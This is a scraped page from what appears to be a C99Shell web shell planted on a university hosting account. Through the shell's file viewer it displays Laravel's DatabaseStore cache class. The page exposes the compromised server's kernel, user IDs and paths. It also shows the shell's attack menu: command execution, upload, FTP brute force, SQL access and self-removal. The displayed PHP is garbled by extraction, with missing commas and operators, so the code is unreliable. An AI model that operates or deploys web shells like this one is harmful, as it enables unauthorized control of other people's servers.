!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/laravel/framework/src/Illuminate/Cache/   drwxr-xr-x
Free 116.5 GB of 200.55 GB (58.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     DatabaseStore.php (6.28 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Cache;

use 
Closure;
use 
Exception;
use 
Illuminate\Contracts\Cache\Store;
use 
Illuminate\Database\ConnectionInterface;
use 
Illuminate\Contracts\Encryption\Encrypter as EncrypterContract;

class 
DatabaseStore implements Store
{
    use 
RetrievesMultipleKeys;

    
/**
     * The database connection instance.
     *
     * @var \Illuminate\Database\ConnectionInterface
     */
    
protected $connection;

    
/**
     * The encrypter instance.
     *
     * @var \Illuminate\Contracts\Encryption\Encrypter
     */
    
protected $encrypter;

    
/**
     * The name of the cache table.
     *
     * @var string
     */
    
protected $table;

    
/**
     * A string that should be prepended to keys.
     *
     * @var string
     */
    
protected $prefix;

    
/**
     * Create a new database store.
     *
     * @param  \Illuminate\Database\ConnectionInterface  $connection
     * @param  \Illuminate\Contracts\Encryption\Encrypter  $encrypter
     * @param  string  $table
     * @param  string  $prefix
     * @return void
     */
    
public function __construct(ConnectionInterface $connectionEncrypterContract $encrypter$table$prefix '')
    {
        
$this->table $table;
        
$this->prefix $prefix;
        
$this->encrypter $encrypter;
        
$this->connection $connection;
    }

    
/**
     * Retrieve an item from the cache by key.
     *
     * @param  string|array  $key
     * @return mixed
     */
    
public function get($key)
    {
        
$prefixed $this->prefix.$key;

        
$cache $this->table()->where('key''='$prefixed)->first();

        
// If we have a cache record we will check the expiration time against current
        // time on the system and see if the record has expired. If it has, we will
        // remove the records from the database table so it isn't returned again.
        
if (! is_null($cache)) {
            if (
is_array($cache)) {
                
$cache = (object) $cache;
            }

            if (
time() >= $cache->expiration) {
                
$this->forget($key);

                return;
            }

            return 
$this->encrypter->decrypt($cache->value);
        }
    }

    
/**
     * Store an item in the cache for a given number of minutes.
     *
     * @param  string  $key
     * @param  mixed   $value
     * @param  int     $minutes
     * @return void
     */
    
public function put($key$value$minutes)
    {
        
$key $this->prefix.$key;

        
// All of the cached values in the database are encrypted in case this is used
        // as a session data store by the consumer. We'll also calculate the expire
        // time and place that on the table so we will check it on our retrieval.
        
$value $this->encrypter->encrypt($value);

        
$expiration $this->getTime() + ($minutes 60);

        try {
            
$this->table()->insert(compact('key''value''expiration'));
        } catch (
Exception $e) {
            
$this->table()->where('key''='$key)->update(compact('value''expiration'));
        }
    }

    
/**
     * Increment the value of an item in the cache.
     *
     * @param  string  $key
     * @param  mixed   $value
     * @return int|bool
     */
    
public function increment($key$value 1)
    {
        return 
$this->incrementOrDecrement($key$value, function ($current$value) {
            return 
$current $value;
        });
    }

    
/**
     * Increment the value of an item in the cache.
     *
     * @param  string  $key
     * @param  mixed   $value
     * @return int|bool
     */
    
public function decrement($key$value 1)
    {
        return 
$this->incrementOrDecrement($key$value, function ($current$value) {
            return 
$current $value;
        });
    }

    
/**
     * Increment or decrement an item in the cache.
     *
     * @param  string  $key
     * @param  mixed  $value
     * @param  \Closure  $callback
     * @return int|bool
     */
    
protected function incrementOrDecrement($key$valueClosure $callback)
    {
        return 
$this->connection->transaction(function () use ($key$value$callback) {
            
$prefixed $this->prefix.$key;

            
$cache $this->table()->where('key'$prefixed)->lockForUpdate()->first();

            if (
is_null($cache)) {
                return 
false;
            }

            if (
is_array($cache)) {
                
$cache = (object) $cache;
            }

            
$current $this->encrypter->decrypt($cache->value);
            
$new $callback($current$value);

            if (! 
is_numeric($current)) {
                return 
false;
            }

            
$this->table()->where('key'$prefixed)->update([
                
'value' => $this->encrypter->encrypt($new),
            ]);

            return 
$new;
        });
    }

    
/**
     * Get the current system time.
     *
     * @return int
     */
    
protected function getTime()
    {
        return 
time();
    }

    
/**
     * Store an item in the cache indefinitely.
     *
     * @param  string  $key
     * @param  mixed   $value
     * @return void
     */
    
public function forever($key$value)
    {
        
$this->put($key$value5256000);
    }

    
/**
     * Remove an item from the cache.
     *
     * @param  string  $key
     * @return bool
     */
    
public function forget($key)
    {
        
$this->table()->where('key''='$this->prefix.$key)->delete();

        return 
true;
    }

    
/**
     * Remove all items from the cache.
     *
     * @return void
     */
    
public function flush()
    {
        
$this->table()->delete();
    }

    
/**
     * Get a query builder for the cache table.
     *
     * @return \Illuminate\Database\Query\Builder
     */
    
protected function table()
    {
        return 
$this->connection->table($this->table);
    }

    
/**
     * Get the underlying database connection.
     *
     * @return \Illuminate\Database\ConnectionInterface
     */
    
public function getConnection()
    {
        return 
$this->connection;
    }

    
/**
     * Get the encrypter instance.
     *
     * @return \Illuminate\Contracts\Encryption\Encrypter
     */
    
public function getEncrypter()
    {
        return 
$this->encrypter;
    }

    
/**
     * Get the cache key prefix.
     *
     * @return string
     */
    
public function getPrefix()
    {
        return 
$this->prefix;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0378 ]--